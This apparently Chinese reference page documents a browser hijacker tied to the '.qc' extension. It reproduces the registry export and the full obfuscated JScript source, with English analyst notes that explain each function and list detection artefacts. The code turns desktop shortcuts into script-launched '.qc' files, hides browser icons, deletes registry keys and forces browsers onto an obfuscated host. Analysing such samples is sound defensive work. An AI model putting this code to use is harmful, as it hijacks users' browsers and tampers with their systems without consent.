.qc
.qc,疑似劫持瀏覽器的軟體所使用的附檔名。
相關
登錄資訊
; Analyst notes on this registry export (the .qc file-type registration):
; - ".qc" is mapped to the ProgID "qcfile". The empty "NeverShowExt" value makes
;   Explorer hide the extension, so a .qc file is displayed without its suffix.
; - DefaultIcon is a REG_EXPAND_SZ (hex(2), UTF-16LE) that decodes to
;   %SystemRoot%\system32\url.dll,0 (the same string the script below writes).
; - shell\open\command launches WScript.exe on
;   "C:\Program Files\WinRAR\winrar.knl" and passes the opened file as %1, so
;   opening any .qc file runs that script. A WScript.exe process started with a
;   winrar.knl argument is therefore a useful detection point.
; - The same CLSID is written to CLSID, shell\open and shellex\IconHandler.
;   NOTE(review): this looks like the class normally used for Internet
;   Shortcuts - confirm against a clean system.
; - The ProgID display name "辦豎源宒" appears to be mis-encoded text
;   (presumably a string saved in a different code page) - not verified.
; - The export is shown collapsed onto one line; line breaks of the original
;   .reg file are not preserved on this page.
Windows Registry Editor Version 5.00 [HKEY_CLASSES_ROOT\.qc] @="qcfile" [HKEY_CLASSES_ROOT\qcfile] @="辦豎源宒" "NeverShowExt"="" [HKEY_CLASSES_ROOT\qcfile\CLSID] @="{FBF23B40-E3F0-101B-8488-00AA003E56F8}" [HKEY_CLASSES_ROOT\qcfile\DefaultIcon] @=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,\ 00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,75,00,72,00,\ 6c,00,2e,00,64,00,6c,00,6c,00,2c,00,30,00,00,00 [HKEY_CLASSES_ROOT\qcfile\shell] @="open" [HKEY_CLASSES_ROOT\qcfile\shell\open] "CLSID"="{FBF23B40-E3F0-101B-8488-00AA003E56F8}" [HKEY_CLASSES_ROOT\qcfile\shell\open\command] @="WScript.exe \"C:\\Program Files\\WinRAR\\winrar.knl\" \"%1\"" [HKEY_CLASSES_ROOT\qcfile\shellex] [HKEY_CLASSES_ROOT\qcfile\shellex\ContextMenuHandlers] @="" [HKEY_CLASSES_ROOT\qcfile\shellex\IconHandler] @="{FBF23B40-E3F0-101B-8488-00AA003E56F8}"
C:\Program Files\WinRAR\WinRAR.knl
// ---------------------------------------------------------------------------
// Analyst notes (the code below is reproduced unchanged from the sample).
//
// Purpose: a Windows Script Host JScript (it uses WScript.*, ActiveXObject and
// GetObject) that replaces desktop/Quick Launch shortcuts with ".qc" files and
// routes every launch through itself so that listed browsers are started with
// a forced URL.
//
// Layout caveat: the listing is collapsed onto a few physical lines. The
// original "//" line comments (e.g. the IsShortcut RegWrite, the body of y(),
// "// B(G);") now swallow the rest of the physical line they sit on, and
// `r(R, D, "", D) l(Z)` in w() has lost its separator. Read it as a record of
// the sample, not as text that parses as shown.
//
// String obfuscation: t() splits a string on "^", XORs each number with k (15)
// and maps it through String.fromCharCode. L() applies t() to A and c in place.
//   A -> IEXPLOR.EXE, MAXTHON.EXE, THEWORLD.EXE, IEXPLORE.EXE, 360SE.EXE,
//        TTRAVELER.EXE, FIREFOX.EXE  (browser image names, upper case)
//   c -> www[.]pp2345[.]com          (host used for the forced URL)
//   M -> http://www[.]pp2345[.]com   (only used in the commented-out y() body)
//
// Helpers, by the names used in the sample:
//   d()  enumerates the subkeys of HKLM\...\Explorer\Desktop\NameSpace through
//        WMI StdRegProv.EnumKey (hDefKey 2147483650); returns [] on any error.
//   K()  linear "array contains value" test.
//   h()  deletes every Desktop\NameSpace subkey whose GUID is not one of four
//        allow-listed GUIDs (comparison is done in upper case).
//   F()  writes four HKCU Explorer values: Policies\Explorer\NoInternetIcon=1,
//        Explorer\StartPage\Favorites=255 (REG_BINARY), and two
//        HideDesktopIcons values set to 1. NOTE(review): these look intended
//        to hide the stock Internet Explorer icons - confirm.
//   s()  builds %USERPROFILE%\Application Data\...\Quick Launch ("" on error).
//   p()  true when the script was started without arguments.
//   m()  true when the upper-cased path contains one of the A entries at an
//        index greater than 0.
//   u(), v()  defined but not called anywhere in the listing.
//   f()  returns the upper-cased paths of files in a folder that end with the
//        given suffix ([] on error).
//   H()  terminates every Win32_Process with the given name, then sleeps 1 s;
//        the only call passes an empty name.
//   r()  writes a .qc file: a "[360]" section holding the escape()d original
//        target (Name=___..___) and arguments (Tel=<<<..>>>), followed by an
//        [InternetShortcut] section with URL=http://www.baidu.com and an icon.
//   I()  writes the HKCR\.qc and HKCR\qcfile registration whose open command
//        is WScript.exe "<ProgramFiles>\WinRAR\winrar.knl" "%1".
//   n()  reads the IE "open" command, then calls ParseFullPath(src); neither
//        name is defined in this listing, so presumably the catch branch
//        always returns the hard-coded iexplore.exe path - confirm.
//   E()  creates the WScript.Shell / FileSystemObject instances, decodes the
//        strings, resolves paths and creates <ProgramFiles>\WinRAR\.
//   a()  handler for an opened .qc file: extracts target and arguments with
//        the ___..___ / <<<..>>> patterns; if m() matches the target it is run
//        with "http://" + a random c entry + "/" as its argument, otherwise
//        the target is run with no arguments (the stored ones are not used).
//   l()  sets a file's attributes to 32 and deletes it; errors are swallowed.
//   e()  for each .LNK in a folder: skips empty targets and targets matching
//        system32, SogouExplorer.exe or HaoZip.exe; for targets ending in .exe
//        it writes <basename>.qc via r() and deletes the .lnk via l().
//   w()  writes "Internet Explerer.qc" (sic) on the all-users desktop that
//        points at the path returned by n().
//   y()  body is commented out.
//
// Control flow: E() always runs. Without arguments the script installs itself
// (I, H(""), F, w, h, then e() over AllUsersDesktop, Desktop and Quick
// Launch). With an argument it first runs a() on that .qc file and then
// re-applies F, w, h and the same e() sweeps, so the changes are restored on
// every shortcut launch.
//
// Artefacts to look for on a host: HKCR\.qc and HKCR\qcfile; the file
// <ProgramFiles>\WinRAR\winrar.knl; WScript.exe started with winrar.knl on its
// command line; .qc files in place of .lnk files on the desktops and in Quick
// Launch; the HKCU Explorer values written by F(); missing
// Desktop\NameSpace subkeys.
// ---------------------------------------------------------------------------
(function() { var P, q; var k = 15; var z = ".qc"; var o = "qcfile"; var D; var C; var A = ["70^74^87^95^67^64^93^33^74^87^74","66^78^87^91^71^64^65^33^74^87^74", "91^71^74^88^64^93^67^75^33^74^87^74", "70^74^87^95^67^64^93^74^33^74^87^74", "60^57^63^92^74^33^74^87^74", "91^91^93^78^89^74^67^74^93^33^74^87^74", "73^70^93^74^73^64^87^33^74^87^74"]; var G; var J; var N; var O; var b; var g; var c = ["120^120^120^33^127^127^61^60^59^58^33^108^96^98"]; var M = "103^123^123^127^53^32^32^120^120^120^33^127^127^61^60^59^58^33^108^96^98"; var t = function(R) { var T = R.split("^"); for (var S in T) { T[S] = T[S] ^ k; T[S] = String.fromCharCode(T[S]) } return T.join("") }; var L = function() { for (var R in A) { A[R] = t(A[R]) } for (var S in c) { c[S] = t(c[S]) } }; var d = function() { var S = 2147483650; sRegPath = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace"; try { oLoc = new ActiveXObject("WbemScripting.SWbemLocator"); oSvc = oLoc.ConnectServer(null, "root\\default"); oReg = oSvc.Get("StdRegProv"); oMethod = oReg.Methods_.Item("EnumKey"); oInParam = oMethod.InParameters.SpawnInstance_(); oInParam.hDefKey = S; oInParam.sSubKeyName = sRegPath; oOutParam = oReg.ExecMethod_(oMethod.Name, oInParam); return oOutParam.sNames.toArray() } catch(R) { return [] } }; var K = function(R, T) { for (var S = 0; S < R.length; S++) { if (R[S] == T) { return true } } return false }; var h = function() { C = d(); try { var S; var R = ["{1f4de370-d627-11d1-ba4f-00a0c91eedba}", "{450D8FBA-AD25-11D0-98A8-0800361B1103}", "{645FF040-5081-101B-9F08-00AA002F954E}", "{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"]; for (S = 0; S < R.length; S++) { R[S] = R[S].toUpperCase() } for (S = 0; S < C.length; S++) { C[S] = C[S].toUpperCase() } for (S = 0; S < C.length; S++) { if (!K(R, C[S])) { P.RegDelete("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace\\" + C[S] + "\\") } } } catch(T) {} }; var F = function() { try { 
P.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoInternetIcon", 1, "REG_DWORD") } catch(R) {} try { P.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\StartPage\\Favorites", 255, "REG_BINARY") } catch(R) {} try { P.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\HideDesktopIcons\\ClassicStartMenu", 1, "REG_DWORD") } catch(R) {} try { P.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\HideDesktopIcons\\NewStartPanel\\{871C5380-42A0-1069-A2EA-08002B30309D}", 1, "REG_DWORD") } catch(R) {} }; var s = function() { try { var U = P.Environment("PROCESS"); var T = U("USERPROFILE"); var R = T + "\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch"; return R } catch(S) { return "" } }; var p = function() { var R = WScript.Arguments; if (R.length == 0) { return true } else { return false } }; var m = function(T) { var U = T.toUpperCase(); for (var R in A) { if (U.indexOf(A[R]) > 0) { return true } } return false }; var u = function() { try { var R = P.RegRead("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ProgramFilesDir"); return R } catch(S) { return "C:\\Program Files" } }; var f = function(Y, W) { try { var U, S, R, ab; var X = new Array; var T = W; U = q.GetFolder(Y); R = new Enumerator(U.files); ab = ""; T = W.toUpperCase(); for (; ! 
R.atEnd(); R.moveNext()) { var aa = R.item(); var Z = ""; Z += aa; Z = Z.toUpperCase(); if ((Z.match(T + "$") == T)) { X[X.length] = Z } } return X } catch(V) { return [] } }; var H = function(S) { var R = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2"); var U = R.ExecQuery('Select * From Win32_Process WHERE name="' + S + '"'); var T = new Enumerator(U); while (!T.atEnd()) { T.item().Terminate(); T.moveNext() } WScript.Sleep(1000) }; var r = function(T, V, S, R) { try { var U = q.CreateTextFile(T, true); U.WriteLine("[360]"); U.WriteLine("Sex=擭"); U.WriteLine("Name=___" + escape(V) + "___"); U.WriteLine("Tel=<<<" + escape(S) + ">>>"); U.WriteLine("[InternetShortcut]"); U.WriteLine("URL=http://www.baidu.com"); U.WriteLine("IconIndex=0"); U.WriteLine("IconFile=" + R); U.Close() } catch(W) {} }; var I = function() { try { P.RegWrite("HKCR\\" + z + "\\", o, "REG_SZ"); P.RegWrite("HKCR\\" + o + "\\", "辦豎源宒", "REG_SZ"); //P.RegWrite("HKCR\\" + o + "\\IsShortcut", "", "REG_SZ"); P.RegWrite("HKCR\\" + o + "\\NeverShowExt", "", "REG_SZ"); P.RegWrite("HKCR\\" + o + "\\DefaultIcon\\", "%SystemRoot%\\system32\\url.dll,0", "REG_EXPAND_SZ"); P.RegWrite("HKCR\\" + o + "\\CLSID\\", "{FBF23B40-E3F0-101B-8488-00AA003E56F8}", "REG_SZ"); P.RegWrite("HKCR\\" + o + "\\shell\\", "open", "REG_SZ"); P.RegWrite("HKCR\\" + o + "\\shell\\open\\CLSID", "{FBF23B40-E3F0-101B-8488-00AA003E56F8}", "REG_SZ"); P.RegWrite("HKCR\\" + o + "\\shell\\open\\command\\", 'WScript.exe "' + g + 'winrar.knl" "%1"', "REG_SZ"); P.RegWrite("HKCR\\" + o + "\\shellex\\IconHandler\\", "{FBF23B40-E3F0-101B-8488-00AA003E56F8}", "REG_SZ"); P.RegWrite("HKCR\\" + o + "\\shellex\\ContextMenuHandlers\\", "", "REG_SZ") } catch(R) {} }; var v = function(S, R) { try { q.CopyFile(S, R) } catch(T) {} }; var n = function() { try { var R = P.RegRead("HKLM\\SOFTWARE\\Clients\\StartMenuInternet\\IEXPLORE.EXE\\shell\\open\\command\\"); R = ParseFullPath(src); R = R.replace(/"/g, "") } catch(S) { return 
"C:\\Program Files\\Internet Explorer\\iexplore.exe" } if (R == "") { return "C:\\Program Files\\Internet Explorer\\iexplore.exe" } return R }; var E = function() { P = new ActiveXObject("WScript.Shell"); q = new ActiveXObject("Scripting.FileSystemObject"); M = t(M); L(); var S = P.Environment("PROCESS"); O = S("SystemRoot") + "\\System32"; b = S("ProgramFiles"); g = b + "\\WinRAR\\"; G = s(); D = n(); try { q.CreateFolder(g) } catch(R) {} }; var a = function(V) { var Y = q.OpenTextFile(V, 1); var X = Y.ReadAll(); var U = /___(.*?)___/ig; var S = /<<<(.*?)>>>/ig; var T, R; if (U.test(X)) { T = RegExp.$1; T = unescape(T) } if (S.test(X)) { R = RegExp.$1; R = unescape(R) } if (T != "") { if (m(T)) { var W = "http://" + c[parseInt(Math.random() * c.length)] + "/"; R = W; if (R != "") { R = '"' + R + '"' } P.Run('"' + T + '" ' + R, 1, false) } else { P.Run('"' + T + '" ', 1, false) } } }; var l = function(R) { try { var S = q.GetFile(R); S.attributes = 32; q.DeleteFile(R) } catch(T) {} }; var e = function(Y) { var T = f(Y, ".LNK"); for (var S in T) { try { var W = T[S]; var V; var aa = ""; var U = ""; var R = ""; var ad = ""; var ab = /\.exe$/ig; var Z = /system32/ig; var Sogou = /\SogouExplorer.exe$/ig; var HaoZip = /\HaoZip.exe$/ig; R = q.GetBaseName(W); V = P.CreateShortcut(W); aa = V.TargetPath; U = V.Arguments; if (aa == "") { continue } if (Z.test(aa)) { continue } else {} if (Sogou.test(aa)) { continue } if (HaoZip.test(aa)) { continue } if (ab.test(aa)) { ad = Y + "\\" + R + z; r(ad, aa, U, aa); l(W) } else {} } catch(X) {} } }; var w = function() { try { var T = P.SpecialFolders("AllUsersDesktop"); var R = T + "\\Internet Explerer" + z; var Z = T + "\\INTERNET EXPLERER" + z; r(R, D, "", D) l(Z) } catch(S) {} }; var y = function() { //P.Run("iexplore.exe " + M) }; E(); if (p()) { I(); H(""); F(); w(); h(); e(P.SpecialFolders("AllUsersDesktop")); e(P.SpecialFolders("Desktop")); // B(G); e(G); y() } else { var x = WScript.Arguments; a(x(0)); F(); w(); h(); 
e(P.SpecialFolders("AllUsersDesktop")); e(P.SpecialFolders("Desktop")); // B(G); e(G) } })();